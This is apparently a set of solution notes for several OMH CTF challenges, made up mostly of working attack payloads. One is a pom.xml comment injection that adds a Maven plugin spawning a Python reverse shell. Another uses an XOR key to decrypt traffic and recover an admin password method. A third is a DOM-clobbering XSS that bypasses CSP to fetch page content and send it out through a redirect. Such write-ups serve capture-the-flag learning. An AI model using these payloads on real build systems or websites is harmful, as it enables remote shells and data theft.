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Last active May 16, 2021 13:36
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OMH CTF Solutions

code_review solution

Add comment in text node of plugin configuration in pom.xml file. This comment will add new plugin and executes reverse shell

                <configuration> // <forkedProcessTimeoutInSeconds>30</forkedProcessTimeoutInSeconds></configuration></plugin>
                        <argument>import sys,socket,os,pty;s=socket.socket();s.connect(("",1337));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")</argument>
</project> // -->


Post data is transmitted with the XOR of 'szefuSecurePassword2021'. Decrypt data and you can notice a method named getUsersDev which gives password to admin.

polite notepad

CSP can be bypassed by adding base tag

politer notepad

This is a nice puzzle, using dom clobbering we manipulate DOM and add nonce to our script tag. I got first blood for this challenge. Add below html as note.

 <pwning urll>ends

        <base href=a:abc><a id=good1 href="">ad</a>
        <a id=bad1 href="urll">ab</a>
        <base href=a:abc><a id=good3 href=">fetch('').then(x=>x.text()).then(x=>{a=btoa(encodeURIComponent(x));location=''+a})//">ad</a>
        <a id=bad3 href="src=">ab</a>
        <base href=a:abc><a id=good4 href="</script>">ad</a>
        <a id=bad4 href="ends">ab</a>
        <base href=a:abc><a id=bad2 href="<pwning">ad</a>
        <a id=good2 href="

Final note looks like below

    <link href="" rel="stylesheet" integrity="sha384-wEmeIV1mKuiNpC+IOBjI7aAzPcEZeedi5yW5f2yOq55WWLwNGmvvx4Um1vskeMj0" crossorigin="anonymous">
    <script src=""></script>

      <div id="content">
           <pwning urll>ends

        <base href=a:abc><a id=good1 href="">ad</a>
        <a id=bad1 href="urll">ab</a>
        <base href=a:abc><a id=good3 href=">fetch('').then(x=>x.text()).then(x=>{a=btoa(encodeURIComponent(x));location=''+a})//">ad</a>
        <a id=bad3 href="src=">ab</a>
        <base href=a:abc><a id=good4 href="</script>">ad</a>
        <a id=bad4 href="ends">ab</a>
        <base href=a:abc><a id=bad2 href="<pwning">ad</a>
        <a id=good2 href="
    <script nonce=oNl8FB0B_pDXSnjjRlaf-Q src="" integrity="sha384-1UV2mnC+iV6gBvv4glb0sAC2atcScwkpEzz5GN3WmVgok8MckQ1yn74acklRk0uo">
    <script nonce=oNl8FB0B_pDXSnjjRlaf-Q>
        var footer = 'if you see anything impolite in this page please <a href="'+document.referrer+'">go back</a>';
        footer = '<div>'+footer+'</div>';
        content = $('#content').html();
        content += footer;
        content = content.replaceAll(bad1, good1);
        content = content.replaceAll(bad2, good2);
        content = content.replaceAll(bad3, good3);
        content = content.replaceAll(bad4, good4);
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